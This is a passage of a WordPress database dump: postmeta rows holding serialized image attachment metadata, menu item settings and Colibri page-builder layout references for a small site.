'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1725;s:6:\"height\";i:709;s:4:\"file\";s:43:\"2022/02/cropped-cropped-header-scaled-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:43:\"cropped-cropped-header-scaled-1-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;}s:5:\"large\";a:3:{s:4:\"file\";s:44:\"cropped-cropped-header-scaled-1-1024x421.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:421;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:43:\"cropped-cropped-header-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:43:\"cropped-cropped-header-scaled-1-768x316.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:316;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:44:\"cropped-cropped-header-scaled-1-1536x631.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:631;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1644921318\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(222,20,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(235,182,'_edit_lock','1731591783:1'),(236,183,'_menu_item_type','post_type'),(237,183,'_menu_item_menu_item_parent','0'),(238,183,'_menu_item_object_id','182'),(239,183,'_menu_item_object','page'),(240,183,'_menu_item_target',''),(241,183,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(242,183,'_menu_item_xfn',''),(243,183,'_menu_item_url',''),(244,185,'_edit_lock','1646443577:1'),(245,186,'_menu_item_type','post_type'),(246,186,'_menu_item_menu_item_parent','0'),(247,186,'_menu_item_object_id','185'),(248,186,'_menu_item_object','page'),(249,186,'_menu_item_target',''),(250,186,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(251,186,'_menu_item_xfn',''),(252,186,'_menu_item_url',''),(255,189,'_wp_attached_file','2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp'),(256,189,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:57:\"2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:57:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-300x200.webp\";s:5:\"width\";i:300;s:6:\"height\";i:200;}s:5:\"large\";a:3:{s:4:\"file\";s:58:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1024x683.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:683;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:57:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:57:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-768x512.webp\";s:5:\"width\";i:768;s:6:\"height\";i:512;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:59:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1536x1024.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(257,190,'_wp_attached_file','2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp'),(258,190,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1365;s:6:\"height\";i:1040;s:4:\"file\";s:65:\"2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:3:{s:4:\"file\";s:65:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-300x229.webp\";s:5:\"width\";i:300;s:6:\"height\";i:229;}s:5:\"large\";a:3:{s:4:\"file\";s:66:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1024x780.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:780;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:65:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:65:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-768x585.webp\";s:5:\"width\";i:768;s:6:\"height\";i:585;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:4:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";}}'),(259,191,'_wp_attached_file','2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp'),(260,191,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1365;s:6:\"height\";i:1365;s:4:\"file\";s:67:\"2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:3:{s:4:\"file\";s:67:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;}s:5:\"large\";a:3:{s:4:\"file\";s:69:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1024x1024.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:67:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:67:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:4:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";}}'),(261,192,'_wp_attached_file','2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp'),(262,192,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:59:\"2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:59:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-300x200.webp\";s:5:\"width\";i:300;s:6:\"height\";i:200;}s:5:\"large\";a:3:{s:4:\"file\";s:60:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1024x683.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:683;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:59:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:59:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-768x512.webp\";s:5:\"width\";i:768;s:6:\"height\";i:512;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:61:\"eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1536x1024.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(263,193,'_wp_attached_file','2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp'),(264,193,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1724;s:6:\"height\";i:374;s:4:\"file\";s:69:\"2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:68:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-300x65.webp\";s:5:\"width\";i:300;s:6:\"height\";i:65;}s:5:\"large\";a:3:{s:4:\"file\";s:70:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-1024x222.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:222;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:69:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:69:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-768x167.webp\";s:5:\"width\";i:768;s:6:\"height\";i:167;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:70:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-1536x333.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:333;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(291,220,'_wp_attached_file','2022/02/colibri-image-31.png'),(292,220,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:28:\"2022/02/colibri-image-31.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:28:\"colibri-image-31-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;}s:5:\"large\";a:3:{s:4:\"file\";s:29:\"colibri-image-31-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:28:\"colibri-image-31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:28:\"colibri-image-31-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:30:\"colibri-image-31-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(372,249,'_wp_attached_file','2022/02/Chetan-Tiwari_300x300.jpg'),(373,249,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:33:\"2022/02/Chetan-Tiwari_300x300.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Chetan-Tiwari_300x300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:33:\"Chetan-Tiwari_300x300-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:1:{s:9:\"thumbnail\";s:3:\"IME\";}}'),(383,258,'_wp_attached_file','2022/02/unsplash.jpg'),(384,258,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:532;s:6:\"height\";i:492;s:4:\"file\";s:20:\"2022/02/unsplash.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:3:{s:4:\"file\";s:20:\"unsplash-300x277.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:277;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:20:\"unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:2:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";}}'),(413,288,'is_colibri-wp_front_page','1'),(414,288,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(415,290,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(420,295,'is_colibri-wp_front_page','1'),(421,295,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(422,297,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(427,302,'is_colibri-wp_front_page','1'),(428,302,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(429,304,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(434,309,'is_colibri-wp_front_page','1'),(435,309,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(436,311,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(441,316,'is_colibri-wp_front_page','1'),(442,316,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(443,318,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(448,323,'is_colibri-wp_front_page','1'),(449,323,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(450,325,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"